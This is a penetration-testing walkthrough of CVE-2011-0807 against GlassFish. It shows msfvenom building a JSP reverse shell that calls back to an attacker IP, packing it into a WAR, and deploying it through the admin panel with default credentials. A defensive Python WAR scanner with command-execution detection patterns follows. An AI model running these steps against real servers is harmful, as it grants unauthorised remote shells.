Description
This module logs in to a GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads a malicious WAR, and executes commands by deploying it. On GlassFish 2.x, 3.0 and Sun Java System Application Server 9.x.
CVE
CVE-2011-0807
Steps to exploit
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Glassfish]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.139.10 LPORT=5566 -f raw -o shell.jsp
Payload size: 1499 bytes
Saved as: shell.jsp
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Glassfish]
└─$ mkdir shell
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Glassfish]
└─$ cp shell.jsp shell
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Glassfish]
└─$ cd shell
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Glassfish/shell]
└─$ jar -cvf ../shell.war *
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
adding: shell.jsp(in = 1499) (out= 587)(deflated 60%)
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Glassfish/shell]
└─$ cd ../
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Glassfish]
└─$ ls
shell shell.jsp shell.war
Glassfish 3.1.3
Log in to the admin panel and click on "Deploy an Application".
Upload the shell WAR file we created earlier and click OK to upload it.
Click Launch to launch the application, and start your listener with ncat.
Click on the link to trigger the shell.
Check back on your listener.
We got a reverse shell, and we are through. Easy, huh?
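The whole chain above works because the admin console will deploy any WAR it is handed, and a JSP placed at the web root of that WAR is served (and executed) on the first request. A practical mitigation on the defender's side, besides removing the default credential, is to inspect WAR archives before they are deployed. The script below is an added example written for this page, not part of the original post or of GlassFish or Metasploit: it opens a WAR as a zip file, flags every JSP that will be reachable over HTTP, and raises an alert when a JSP contains indicators typical of command-execution payloads. The indicator list, the function names (`audit_war`, `build_sample_war`, `highest_severity`) and the sample WARs are all constructed for this example.

```python
import io
import re
import zipfile

# Indicators commonly found in command-execution JSPs. This is a constructed
# list for the example (an assumption), not a signature set from any product.
SUSPICIOUS_PATTERNS = {
    "runtime-exec": re.compile(rb"Runtime\.getRuntime\(\)\.exec\s*\("),
    "process-builder": re.compile(rb"new\s+ProcessBuilder\s*\("),
    "raw-socket": re.compile(rb"java\.net\.Socket|new\s+Socket\s*\("),
    "shell-binary": re.compile(rb"/bin/(ba)?sh|cmd\.exe"),
}


def audit_war(war_bytes):
    """Inspect a WAR (given as bytes) and return a list of findings.

    Each finding is a dict with 'member', 'severity' ('info' or 'alert') and
    'reason'. Any JSP outside WEB-INF/ is served on request once the WAR is
    deployed, so its presence is reported as 'info'; a JSP that contains a
    command-execution indicator is reported as 'alert'.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for info in war.infolist():
            name = info.filename
            if info.is_dir() or not name.lower().endswith((".jsp", ".jspx")):
                continue
            if not name.startswith("WEB-INF/"):
                findings.append({"member": name, "severity": "info",
                                 "reason": "JSP is reachable over HTTP once deployed"})
            body = war.read(name)
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(body):
                    findings.append({"member": name, "severity": "alert",
                                     "reason": "command-execution indicator: " + label})
    return findings


def build_sample_war(members):
    """Build an in-memory WAR from {member_name: bytes}; only used to construct test input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        for name, data in members.items():
            war.writestr(name, data)
    return buf.getvalue()


def highest_severity(findings):
    """Collapse a list of findings to a single verdict: 'alert', 'info' or 'clean'."""
    severities = {f["severity"] for f in findings}
    if "alert" in severities:
        return "alert"
    if "info" in severities:
        return "info"
    return "clean"


if __name__ == "__main__":
    # Constructed samples: one JSP carrying an exec indicator, one plain JSP page.
    suspicious = build_sample_war({
        "shell.jsp": b'<%@ page import="java.io.*" %><% Runtime.getRuntime().exec("id"); %>',
    })
    benign = build_sample_war({
        "index.jsp": b"<html><body>Hello</body></html>",
        "WEB-INF/web.xml": b"<web-app/>",
    })
    for label, war in (("suspicious", suspicious), ("benign", benign)):
        findings = audit_war(war)
        print(label, "->", highest_severity(findings))
        for f in findings:
            print("  ", f["severity"], f["member"], f["reason"])
```

Run it against a real archive with `audit_war(open("shell.war", "rb").read())`. A plain JSP page only yields an `info` verdict; the point of the `info` level is that a WAR with no JSP at all (static content plus `WEB-INF/`) comes back `clean`, so a deployment pipeline can require a human review whenever anything executable sits at the web root. Substring matching is deliberately simple and will not catch obfuscated payloads, so treat an `alert` as a hard stop and a `clean` verdict as a weak signal, not proof of safety.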